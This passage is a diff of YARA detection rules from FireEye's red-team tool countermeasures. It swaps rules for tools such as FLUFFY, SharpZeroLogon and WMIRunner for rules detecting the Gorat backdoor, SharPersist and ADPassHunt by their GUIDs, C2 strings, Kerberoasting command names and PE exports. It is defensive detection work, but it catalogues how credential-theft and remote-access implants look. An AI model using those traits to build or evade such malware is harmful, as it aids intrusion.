 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETSHSHELLCODERUNNER/production/yara/Loader_MSIL_NetshShellCodeRunner_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Module_PowerShell_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "97f6475a9d42697f633e06a9b04a85021ca4920145eb4af257d71b431448f0e9"
+		logic_hash = "e596bc0316a4ef85f04c2683ebc7c94bf9b831843232c33e62c84991e4caeb97"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		rev = 2
-
-	strings:
-		$typelibguid0 = "49c045bc-59bb-4a00-85c3-4beb59b2ee12" ascii nocase wide
-
-	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
-}
-rule FIREEYE_RT_APT_Hacktool_MSIL_GPOHUNT_1 : FILE
-{
-	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'gpohunt' project."
-		author = "FireEye"
-		id = "e4325f11-103c-5893-8978-9a72f7ca6105"
-		date = "2020-12-08"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GPOHUNT/production/yara/APT_HackTool_MSIL_GPOHUNT_1.yar#L4-L15"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "4b1f175dac123a6340494e2730d66c718478fb7618dc5611315992ed33e0f6c7"
-		score = 50
-		quality = 73
+		quality = 71
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid0 = "751a9270-2de0-4c81-9e29-872cd6378303" ascii nocase wide
+		$typelibguid0 = "38d89034-2dd9-4367-8a6e-5409827a243a" ascii nocase wide
+		$typelibguid1 = "845ee9dc-97c9-4c48-834e-dc31ee007c25" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Corehound_1 : FILE
+rule FIREEYE_RT_Trojan_MSIL_GORAT_Plugin_DOTNET_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CoreHound' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Plugin - .NET' project."
 		author = "FireEye"
-		id = "8c914b34-3e3d-53ae-a5e4-9dbfdff45a24"
+		id = "faa73d64-4bb1-5c06-a3a5-1f1aa99ea932"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/COREHOUND/production/yara/HackTool_MSIL_CoreHound_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Plugin_DOTNET_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "b0f759709428d5c9404507a13259bf85cb8c405d38b807539098f7cc871023d8"
+		logic_hash = "e979822273c6d1ccdfebd341c9e2cb1040fe34a04e8b41c024885063fd946ad5"
 		score = 75
-		quality = 73
+		quality = 71
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "1fff2aee-a540-4613-94ee-4f208b30c599" ascii nocase wide
+		$typelibguid0 = "cd9407d0-fc8d-41ed-832d-da94daa3e064" ascii nocase wide
+		$typelibguid1 = "fc3daedf-1d01-4490-8032-b978079d8c2d" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_2 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "This detects if a sample is less than 50KB and has a number of strings found in the Gorat shellcode (stage0 loader). The loader contains an embedded DLL (stage0.dll) that contains a number of unique strings. The 'Cookie' string found in this loader is important as this cookie is needed by the C2 server to download the Gorat implant (stage1 payload)."
 		author = "FireEye"
-		id = "ce39710e-7649-5f7d-bbbe-65dc30f678e8"
-		date = "2020-12-04"
-		date = "2020-12-04"
+		id = "5ac84cf1-49fb-533d-b211-b1a92239063b"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_2.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_1.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "11b5aceb428c3e8c61ed24a8ca50553e"
-		logic_hash = "872ab717668375a49d6c7b1927a680747b405c0198fe4fc6f43ccc562870eb37"
+		hash = "66cdaa156e4d372cfa3dea0137850d20"
+		logic_hash = "f6a0a923f64375e7ffdc080aec41db19a9e162405f1290ed0bbcce5a342bdadb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$s1 = "\x00Asktgt\x00"
-		$s2 = "\x00Kerberoast\x00"
-		$s3 = "\x00HarvestCommand\x00"
-		$s4 = "\x00EnumerateTickets\x00"
-		$s5 = "[*] Action: " wide
-		$s6 = "\x00Fluffy.Commands\x00"
+		$s1 = "httpComms.dll" ascii wide
+		$s2 = "Cookie: SID1=%s" ascii wide
+		$s3 = "Global\\" ascii wide
+		$s4 = "stage0.dll" ascii wide
+		$s5 = "runCommand" ascii wide
+		$s6 = "getData" ascii wide
+		$s7 = "initialize" ascii wide
+		$s8 = "Windows NT %d.%d;" ascii wide
+		$s9 = "!This program cannot be run in DOS mode." ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		filesize < 50KB and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Macos_GORAT_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "This rule is looking for specific strings associated with network activity found within the MacOS generated variant of GORAT"
 		author = "FireEye"
-		id = "6593202d-9b30-59ed-98c0-3e730fb5ceb7"
-		date = "2020-12-04"
-		date = "2020-12-04"
+		id = "4646eadb-7acf-582f-9ad6-00f012ceed8a"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_MacOS_GORAT_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "11b5aceb428c3e8c61ed24a8ca50553e"
-		logic_hash = "4d91c96ab7b628e88f79ee193612acc959448fe2220ef54371f5f5c6e7305d86"
+		hash = "68acf11f5e456744262ff31beae58526"
+		logic_hash = "2df5f87d44968670511880d21ad184779d0561c7c426a5d6426bcefd0904a9b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$sb1 = { 0E ?? 1? 72 [4] 28 [2] 00 06 [0-16] 28 [2] 00 0A [2-80] 1F 58 0? [0-32] 28 [2] 00 06 [2-32] 1? 28 [2] 00 06 0? 0? 6F [2] 00 06 [2-4] 1F 0B }
-		$sb2 = { 73 [2] 00 06 13 ?? 11 ?? 11 ?? 7D [2] 00 04 11 ?? 73 [2] 00 0A 7D [2] 00 04 0E ?? 2D ?? 11 ?? 7B [2] 00 04 72 [4] 28 [2] 00 0A [2-32] 0? 28 [2] 00 0A [2-16] 11 ?? 7B [2] 00 04 0? 28 [2] 00 0A 1? 28 [2] 00 0A [2-32] 7E [2] 00 0A [0-32] FE 15 [2] 00 02 [0-16] 7D [2] 00 04 28 [2] 00 06 [2-32] 7B [2] 00 04 7D [2] 00 04 [2-32] 7C [2] 00 04 FE 15 [2] 00 02 [0-16] 11 ?? 8C [2] 00 02 28 [2] 00 0A 28 [2] 00 0A [2-80] 8C [2] 00 02 28 [2] 00 0A 12 ?? 12 ?? 12 ?? 28 [2] 00 06 }
-		$ss1 = "\x00Fluffy\x00"
+		$s1 = "SID1=%s" ascii wide
+		$s2 = "http/http.dylib" ascii wide
+		$s3 = "Mozilla/" ascii wide
+		$s4 = "User-Agent" ascii wide
+		$s5 = "Cookie" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		(( uint32( 0 ) == 0xBEBAFECA ) or ( uint32( 0 ) == 0xFEEDFACE ) or ( uint32( 0 ) == 0xFEEDFACF ) or ( uint32( 0 ) == 0xCEFAEDFE ) ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Wmirunner_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_Gorat_Memory
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIRunner' project."
+		description = "Identifies GoRat malware in memory based on strings."
 		author = "FireEye"
-		id = "04c6acfc-859f-5e4a-8c59-9adf08f21657"
+		id = "16fb1db7-711c-5d8d-9203-738c94f253fe"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMIRUNNER/production/yara/Loader_MSIL_WMIRunner_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GoRat_Memory.yar#L4-L27"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "49d21756a4f0b29909c4b0fa9f3a98dd0480f9401923032de4b3920814b85f29"
+		hash = "3b926b5762e13ceec7ac3a61e85c93bb"
+		logic_hash = "88272e59325d106f96d6b6f1d57daf968823c1e760067dee0334c66c521ce8c2"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 75
+		tags = ""
 		rev = 1
 
 	strings:
-		$typelibguid0 = "6cc61995-9fd5-4649-b3cc-6f001d60ceda" ascii nocase wide
+		$murica = "murica" fullword
+		$rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
+		$rat2 = "rat.(*Core).generateBeacon" fullword
+		$rat3 = "rat.gJitter" fullword
+		$rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword
+		$rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword
+		$rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword
+		$rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword
+		$rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword
+		$rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
+		$rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword
+		$rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword
+		$winblows = "rat/platforms/win.(*winblows).GetStage" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$winblows or #murica > 10 or 3 of ( $rat* )
 }
-rule FIREEYE_RT_Hacktool_MSIL_SHARPZEROLOGON_1 : FILE
+
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_4 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'sharpzerologon' project."
+		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality."
 		author = "FireEye"
-		id = "51f22eee-fb96-55b0-8c02-1a0e9910a93e"
+		id = "fa3bcaad-c210-5b9c-8567-fe85b8e78055"
 		date = "2020-12-08"
-		modified = "2020-12-09"
+		modified = "2021-03-03"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPZEROLOGON/production/yara/HackTool_MSIL_SHARPZEROLOGON_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_4.yar#L5-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "ed6a9bef5c6ee03aff969b8765b284ace517f2e6a1ef114acb04cf094c69cfa5"
+		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
+		logic_hash = "ec201614cb91fae9d7c89febfa22dfd6ba7f353e0eeb0b2fec6c8d887992e79e"
 		score = 75
-		quality = 73
+		quality = 25
 		tags = "FILE"
-		rev = 3
+		rev = 8
 
 	strings:
-		$typelibguid0 = "15ce9a3c-4609-4184-87b2-e29fc5e2b770" ascii nocase wide
+		$mz = "MZ"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$mz at 0 and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and pe.exports ( "MemoryCallEntryPoint" ) and pe.exports ( "MemoryDefaultAlloc" ) and pe.exports ( "MemoryDefaultFree" ) and pe.exports ( "MemoryDefaultFreeLibrary" ) and pe.exports ( "MemoryDefaultGetProcAddress" ) and pe.exports ( "MemoryDefaultLoadLibrary" ) and pe.exports ( "MemoryFindResource" ) and pe.exports ( "MemoryFindResourceEx" ) and pe.exports ( "MemoryFreeLibrary" ) and pe.exports ( "MemoryGetProcAddress" ) and pe.exports ( "MemoryLoadLibrary" ) and pe.exports ( "MemoryLoadLibraryEx" ) and pe.exports ( "MemoryLoadResource" ) and pe.exports ( "MemoryLoadString" ) and pe.exports ( "MemoryLoadStringEx" ) and pe.exports ( "MemorySizeofResource" ) and pe.exports ( "callback" ) and pe.exports ( "crosscall2" ) and pe.exports ( "crosscall_386" )
 }
-rule FIREEYE_RT_FE_APT_Loader_MSIL_REVOLVER_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times."
 		author = "FireEye"
-		id = "d99620e0-39ed-58db-acce-0d885a9e0bf7"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "e2c47711-d088-5cb4-8d21-f8199a865a28"
+		date = "2020-12-08"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_Loader_MSIL_REVOLVER_1.yar#L5-L14"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_2.yar#L4-L34"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "1231f4c961dec122ebcb142052c2c7c03acf9b556cdb71a3efabde6bcf50a939"
+		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
+		logic_hash = "8efc904498386d89879766a5021148a250f639bc328df12a34cfc8d620df6f6c"
 		score = 75
 		quality = 50
 		tags = "FILE"
+		rev = 7
 
 	strings:
-		$inject = { 28 [2] 00 06 0? 0? 7B [2] 00 04 7E [2] 00 0A 28 [2] 00 0A [2-40] 7E [2] 00 0A 0? 20 00 10 00 00 28 [2] 00 0A 0? 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? ?? 20 00 30 00 00 1F 40 28 [2] 00 06 [2-40] 28 [2] 00 0A 1? 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 1? ?? FE 15 [2] 00 02 1? ?? 72 [2] 00 70 28 [2] 00 06 1? ?? FE 15 [2] 00 02 1? ?? 1? ?? 1? 28 [2] 00 06 2? 7E [2] 00 0A 1? ?? 0? 7B [2] 00 04 1? ?? 1? 1? ?? 28 [2] 00 06 2? ?? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-10] 7E [2] 00 0A 1? ?? 1? ?? 20 [2] 1F 00 7E [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? 1? 20 [2] 00 00 20 [2] 00 00 7E [2] 00 0A 28 [2] 00 06 2? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-40] 1? ?? 0? 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 2? ?? 2? 1? 1? ?? 1? ?? 1? ?? 28 [2] 00 06 }
-		$iz1 = /_Cor(Exe|Dll)Main/ fullword
+		$go1 = "go.buildid" ascii wide
+		$go2 = "Go build ID:" ascii wide
+		$json1 = "json:\"pid\"" ascii wide
+		$json2 = "json:\"key\"" ascii wide
+		$json3 = "json:\"agent_time\"" ascii wide
+		$json4 = "json:\"rid\"" ascii wide
+		$json5 = "json:\"ports\"" ascii wide
+		$json6 = "json:\"agent_platform\"" ascii wide
+		$rat = "rat" ascii wide
+		$str1 = "handleCommand" ascii wide
+		$str2 = "sendBeacon" ascii wide
+		$str3 = "rat.AgentVersion" ascii wide
+		$str4 = "rat.Core" ascii wide
+		$str5 = "rat/log" ascii wide
+		$str6 = "rat/comms" ascii wide
+		$str7 = "rat/modules" ascii wide
+		$str8 = "murica" ascii wide
+		$str9 = "master secret" ascii wide
+		$str10 = "TaskID" ascii wide
+		$str11 = "rat.New" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_REVOLVER_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'revolver' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "8fa5adb7-dc66-51bc-9f60-2308515f33a8"
+		id = "49d7891e-b97a-52a8-acfd-bbf986732d6c"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_HackTool_MSIL_REVOLVER_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_2.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "8df8a56ed55b7857adb95daa643d544a49eb5f1952b4ad3ef757c34dad2ce317"
+		hash = "98ecf58d48a3eae43899b45cec0fc6b7"
+		logic_hash = "57387352f8fd08e8b859dffc1164d46370f248b337526c265634160010572a00"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide
-		$typelibguid1 = "b214d962-7595-440b-abef-f83ecdb999d2" ascii nocase wide
+		$a1 = "SharPersist.lib"
+		$a2 = "SharPersist.exe"
+		$b1 = "ERROR: Invalid hotkey location option given." ascii wide
+		$b2 = "ERROR: Invalid hotkey given." ascii wide
+		$b3 = "ERROR: Keepass configuration file not found." ascii wide
+		$b4 = "ERROR: Keepass configuration file was not found." ascii wide
+		$b5 = "ERROR: That value already exists in:" ascii wide
+		$b6 = "ERROR: Failed to delete hidden registry key." ascii wide
+		$pdb1 = "\\SharPersist\\"
+		$pdb2 = "\\SharPersist.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or ( 1 of ( $a* ) and 2 of ( $b* ) ) )
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_JUSTASK_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'justask' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPersist project."
 		author = "FireEye"
-		id = "06a03d82-db69-5b5a-a578-a8053814e917"
+		id = "586e6c91-6970-57d1-8d8c-05ae9eb6117a"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/JUSTASK/production/yara/APT_HackTool_MSIL_JUSTASK_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "24d2f8e3838c4f02cd80644a396ce7cf105761d2feba54e39973564ca5e97571"
+		hash = "98ecf58d48a3eae43899b45cec0fc6b7"
+		logic_hash = "cf480026c31b522850e25ba2d7986773d9c664242a2667ecd33151621c98c91e"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "aa59be52-7845-4fed-9ea5-1ea49085d67a" ascii nocase wide
+		$typelibguid1 = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Hacktool_MSIL_GETDOMAINPASSWORDPOLICY_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the recon utility 'getdomainpasswordpolicy' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "69745e99-33cc-5171-ae7a-5c98439a0b6d"
-		date = "2020-12-08"
+		id = "736b5300-215b-5314-9234-69ff0050b73e"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GETDOMAINPASSWORDPOLICY/production/yara/HackTool_MSIL_GETDOMAINPASSWORDPOLICY_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "6b2ea3ebfea2c87f16052f4a43b64eb2d595c2dd4a64d45dfce1642668dcf602"
-		score = 75
-		quality = 73
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "63135c81c1a6b967cb26cced628afc0e7ef485923e6a7fd70a4d4672118d6a8c"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$typelibguid0 = "a5da1897-29aa-45f4-a924-561804276f08" ascii nocase wide
+		$sb1 = { 73 [2] 00 0A 0A 02 6F [2] 00 0A 0B 38 [4] 12 ?? 28 [2] 00 0A 0? 73 [2] 00 0A 0? 0? 0? 6F [2] 00 0A 1? 13 ?? 72 [4] 13 ?? 0? 6F [2] 00 0A 72 [4] 6F [2] 00 0A 1? 3B [4] 11 ?? 72 [4] 28 [2] 00 0A 13 ?? 0? 72 [4] 6F [2] 00 0A 6F [2] 00 0A 13 ?? 38 [4] 11 ?? 6F [2] 00 0A 74 [2] 00 01 13 ?? 11 ?? 72 [4] 6F [2] 00 0A 2C ?? 11 ?? 72 [4] 11 ?? 6F [2] 00 0A 72 [4] 6F [2] 00 0A 6F [2] 00 0A 72 [4] 28 [2] 00 0A }
+		$sb2 = { 02 1? 8D [2] 00 01 [0-32] 1? 1F 2E 9D 6F [2] 00 0A 72 [4] 0A 0B 1? 0? 2B 2E 0? 0? 9A 0? 0? 72 [4] 6F [2] 00 0A 2D ?? 06 72 [4] 28 [2] 00 0A 0A 06 72 [4] 0? 28 [2] 00 0A 0A 0? 1? 58 0? 0? 0? 8E 69 32 CC 06 2A }
 
 	condition:
-		filesize < 10MB and ( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
